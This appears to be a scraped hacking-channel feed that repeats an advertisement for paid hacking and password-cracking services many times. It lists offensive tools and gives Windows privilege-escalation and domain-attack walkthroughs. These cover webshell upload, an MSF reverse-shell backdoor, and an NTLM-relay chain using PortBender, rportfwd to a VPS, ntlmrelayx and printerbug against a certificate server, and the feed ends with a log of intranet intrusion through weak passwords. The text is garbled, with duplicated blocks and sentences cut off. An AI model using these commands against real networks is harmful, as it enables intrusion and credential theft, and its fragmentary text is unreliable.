Windows Privilege Escalation (PEA) knowledge: permission division, basic commands, system vulnerability privilege escalation, querying patch information, database privilege escalation, UDF privilege escalation, MOF privilege escalation, boot item privilege escalation, MSF privilege escalation, kernel privilege escalation, token manipulation, and Bypass UAC.
We offer professional hacking services, including penetration testing, website privilege escalation, password cracking, and data breach investigations. Inquiries are welcome. @PipiShrimp
We offer professional hacking services, including penetration testing, website privilege escalation, password cracking, and data breach investigations. Inquiries are welcome. @PipiShrimp
Chinese company Socialarks leaked data from Facebook, Instagram, and LinkedIn, affecting 208 gigabytes of users and containing over 318 million records. The database contained personally identifiable information from approximately 214 million social media users worldwide. The leak was attributed to the Elasticsearch database not using strong passwords or encryption for protection.
We offer professional hacking services, including penetration testing, website privilege escalation, password cracking, and data breach investigations. Inquiries are welcome. @PipiShrimp
We offer professional hacking services, including penetration testing, website privilege escalation, password cracking, and data breach investigations. Inquiries are welcome. @PipiShrimp
LadonGo is an intranet penetration testing and vulnerability scanning framework that can easily detect live hosts in C, B, and A segments with a single click. It also features fingerprinting, port scanning, password brute-force, remote execution, and high-risk vulnerability detection. Version 3.2 includes 24 modules, high-risk vulnerability detection (MS17010, SmbGhost), remote execution (SshCmd, WinrmCmd), and password brute-force (SmbScan).
We offer professional hacking services, including penetration testing, website privilege escalation, password cracking, and data breach investigations. Inquiries are welcome. @PipiShrimp
We offer professional hacking services, including penetration testing, website privilege escalation, password cracking, and data breach investigations. Inquiries are welcome. @PipiShrimp
Fawkes is a tool that uses the Google search engine to find targets vulnerable to SQL injection attacks. It's written in Python 3 and uses 49 random user agents. An example of its usage is:
We offer professional hacking services, including penetration testing, website privilege escalation, password cracking, and data breach investigations. Inquiries are welcome. @PipiShrimp
python3 fawkes.py --query ‘noticias.php?id=10’ --timeout 3 --verbose.We offer professional hacking services, including penetration testing, website privilege escalation, password cracking, and data breach investigations. Inquiries are welcome. @PipiShrimp
Social-analyzer analyzes and finds profiles on over 300 social media websites. It includes APIs and web applications for analyzing and finding profiles on over 300 social media websites. It comprises various string analysis and detection modules. The detection modules utilize a rating mechanism based on different detection technologies to generate a ratio value from 0 to 100.
We offer professional hacking services, including penetration testing, website privilege escalation, password cracking, and data breach investigations. Inquiries are welcome. @PipiShrimp
We offer professional hacking services, including penetration testing, website privilege escalation, password cracking, and data breach investigations. Inquiries are welcome. @PipiShrimp
Web Fuzzing Box - A dictionary and payloads for web fuzzing, primarily including: weak password brute-force attacks, directory and file enumeration, web vulnerabilities, 401 authentication dictionaries, top ranking dictionaries, APIs, filename extensions, CTF competition dictionaries, SQL injection, URL redirection vulnerabilities, and XSS payloads dictionaries.
We offer professional hacking services, including penetration testing, website privilege escalation, password cracking, and data breach investigations. Inquiries are welcome. @PipiShrimp
We offer professional hacking services, including penetration testing, website privilege escalation, password cracking, and data breach investigations. Inquiries are welcome. @PipiShrimp
A batch detection tool for the Apache Flink directory traversal vulnerability CVE-2020-17519 was developed. This vulnerability allows attackers to read any file on the JobManager's local file system via the JobManager process's REST interface. The CVE-2020-17519 payload...
We offer professional hacking services, including penetration testing, website privilege escalation, password cracking, and data breach investigations. Inquiries are welcome. @PipiShrimp
We offer professional hacking services, including penetration testing, website privilege escalation, password cracking, and data breach investigations. Inquiries are welcome. @PipiShrimp
MyJWT is a JSON Web Token (JWT) penetration testing tool. This command-line tool is designed for penetration testers, CTF competitors, or developers. You can modify your JWT, sign it, inject it, brute-force the key, crack the JWT using regular expressions to guess the key, and use JKU Bypass and X5u Bypass.
We offer professional hacking services, including penetration testing, website privilege escalation, password cracking, and data breach investigations. Inquiries are welcome. @PipiShrimp
We offer professional hacking services, including penetration testing, website privilege escalation, password cracking, and data breach investigations. Inquiries are welcome. @PipiShrimp
This is a batch GetShell tool for Ruijie EG Easy Gateway devices, exploiting vulnerabilities such as Gateway GetShell. To use it, enter the remote WebShell address. This tool contains malicious code and is for authorized security testing purposes only. Run the command:
We offer professional hacking services, including penetration testing, website privilege escalation, password cracking, and data breach investigations. Inquiries are welcome. @PipiShrimp
java -jar EGGatewayGetShell.jar.We offer professional hacking services, including penetration testing, website privilege escalation, password cracking, and data breach investigations. Inquiries are welcome. @PipiShrimp
The experiment uses members of the Dns Administrators group to remotely configure the Dns service and perform DLL injection to achieve privilege escalation.
Within the domain, the Dns server is usually the Dc Server. The Dns server management is based on RPC, creating an RPC interface by calling c:\windows\system32\dns.exe, and using the \\PIPE\\DNSSERVER named pipe for transmission.
The default ACL of the DNS service is shown in the figure below:
Within the domain, the Dns server is usually the Dc Server. The Dns server management is based on RPC, creating an RPC interface by calling c:\windows\system32\dns.exe, and using the \\PIPE\\DNSSERVER named pipe for transmission.
The default ACL of the DNS service is shown in the figure below:
❤1
Upload backdoor files to gain webshell access.
In web privilege escalation, the most commonly used method is overflow vulnerability escalation, using cmd to execute files for privilege escalation. From the image below, it is clear that the permissions seen in the webshell differ from those seen on the server.
Use systeminfo for information gathering, generally focusing on the operating system version and installed patch numbers.
After obtaining the patch numbers, we need to filter patches. Two excellent projects are recommended: wesng and windowsVulnScan. Save the collected information above into 1.txt and use wesng for patch filtering.
After execution, possible vulnerabilities will be saved in vuln.csv.
Use MSF or specific EXP for privilege escalation (msf must be set up on the external network to allow the session to reverse back to the local machine; it cannot reverse in the internal network). Generate a 5577.exe backdoor, execute this backdoor via webshell, with the reverse port set to 5577.
Set the listening port to 5577.
In web privilege escalation, the most commonly used method is overflow vulnerability escalation, using cmd to execute files for privilege escalation. From the image below, it is clear that the permissions seen in the webshell differ from those seen on the server.
Use systeminfo for information gathering, generally focusing on the operating system version and installed patch numbers.
After obtaining the patch numbers, we need to filter patches. Two excellent projects are recommended: wesng and windowsVulnScan. Save the collected information above into 1.txt and use wesng for patch filtering.
After execution, possible vulnerabilities will be saved in vuln.csv.
Use MSF or specific EXP for privilege escalation (msf must be set up on the external network to allow the session to reverse back to the local machine; it cannot reverse in the internal network). Generate a 5577.exe backdoor, execute this backdoor via webshell, with the reverse port set to 5577.
Set the listening port to 5577.
Upload according to your system bitness:
upload xxxx.sys
Execute redirection:
PortBender redirect 445 8445
Enable port forwarding:
rportfwd 8445 vpsip 445
cs enable socks.
On the hacker machine:
Set proxy.
Enable relay:
proxychains4 ntlmrelayx.py -t http://192.168.8.144/certsrv/certfnsh.asp -smb2support --adcs --template 'domain controller';
Use socks or exe to trigger forced callback, such as printer:
python printerbug.py domain.com/user:pass@192.168.8.155 192.168.8.75
Successfully obtained certificate information:
upload xxxx.sys
Execute redirection:
PortBender redirect 445 8445
Enable port forwarding:
rportfwd 8445 vpsip 445
cs enable socks.
On the hacker machine:
Set proxy.
Enable relay:
proxychains4 ntlmrelayx.py -t http://192.168.8.144/certsrv/certfnsh.asp -smb2support --adcs --template 'domain controller';
Use socks or exe to trigger forced callback, such as printer:
python printerbug.py domain.com/user:pass@192.168.8.155 192.168.8.75
Successfully obtained certificate information:
Check the network address of the WEB server
Check the current user
Check the firewall configuration information
netsh firewall show config
Check installed antivirus software
Found no antivirus software installed.
Check the current user
Check the firewall configuration information
netsh firewall show config
Check installed antivirus software
Found no antivirus software installed.
So add your own IP to the 2001 ACL rule set. After adding the ACL rule, you can connect.
Tried to use plink to do SSH forwarding into the intranet, but the security device is different from Linux and cannot proxy.
Tried to use plink to do SSH forwarding into the intranet, but the security device is different from Linux and cannot proxy.
Previously, the internal network discovery was all done using timeoutsocket, but this time, no assets were found using timeoutsocket, including some existing targets. Later, many live hosts were found using F-NAScan.
There are fewer application types on the hosts, more devices, and many weak passwords, which will not be mentioned here. The main focus is on the discovery of centralized devices.
Two centralized devices were found in the internal network. One is a terminal detection system from a certain vendor, as shown below:
Tried common passwords but couldn't get in.
The second is a terminal detection system from another vendor, accessed the backend through a weak password.
There are fewer application types on the hosts, more devices, and many weak passwords, which will not be mentioned here. The main focus is on the discovery of centralized devices.
Two centralized devices were found in the internal network. One is a terminal detection system from a certain vendor, as shown below:
Tried common passwords but couldn't get in.
The second is a terminal detection system from another vendor, accessed the backend through a weak password.